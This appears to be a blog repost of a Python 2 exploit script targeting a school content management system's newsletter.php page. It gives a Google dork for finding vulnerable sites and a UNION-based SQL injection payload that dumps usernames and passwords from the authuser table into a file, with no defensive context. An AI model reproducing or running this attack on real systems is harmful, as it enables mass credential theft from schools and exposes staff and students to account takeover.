Code:
#Date: 11/28/12
#Author: Dyme
#Vendor: www.poweritschools.com
#Google Dork: inurl:/old_core/newsletter.php
#Tested on: Windows 8, Ubuntu 12.04
The vulnerability was found in the newsletter.php script.
#!/usr/bin/python
import urllib2
import re
def get_sauce(site):
response = urllib2.urlopen(site)
page_source = response.read()
return page_source
def inject(site):
eqpos = site.find("=");
nsitelist = list(site)
nsitelist.insert(eqpos+1, "-")
nsite = ''.join(nsitelist)
dump = open('dump.txt', 'w')
limit = 0
syntax = nsite + "+UNION+SELECT+1,2,3,4,5,concat(uname,0x3a,passwd),7,8,9,10,11,12,13,14,15,16,17+from+authuser+LIMIT+" + str(limit) + ",1--"
sauce = get_sauce(syntax)
while "Error : Unable to access the templates directory" in sauce:
syntax = nsite + "+UNION+SELECT+1,2,3,4,5,concat(uname,0x3a,passwd),7,8,9,10,11,12,13,14,15,16,17+from+authuser+LIMIT+" + str(limit) + ",1--"
sauce = get_sauce(syntax)
if "Error : Unable to access the templates directory" in sauce:
r = re.findall(">(.+):(.+) ", sauce)[0]
print r[0] + ":" + r[1]
dump.write(r[0] + ":" + r[1] + "\n")
limit += 1
else:
print "###########################################"
print "#All logins successfully dumped #"
print "#Logins saved in username:password format #"
print "#Logins dumped to dump.txt #"
print "#Bye! #"
print "###########################################"
print " ______ "
print "|_ _ `. "
print " | | `. \ _ __ _ .--..--. .---. "
print " | | | |[ \ [ ][ `.-. .-. |/ /__\\ "
print " _| |_.' / \ '/ / | | | | | || \__., "
print "|______.'[\_: / [___||__||__]'.__.' "
print " \__.' "
print "######################################"
print "#Title: SchoolCMS SQL Injection #"
print "#Date: 11/28/12 #"
print "#Author: Dyme #"
print "#Vendor: www.poweritschools.com #"
print "#Tested on: Windows 8, Ubuntu 12.04 #"
print "######################################"
site = raw_input("Vulnerable link: ")
inject(site)
Nenhum comentário:
Postar um comentário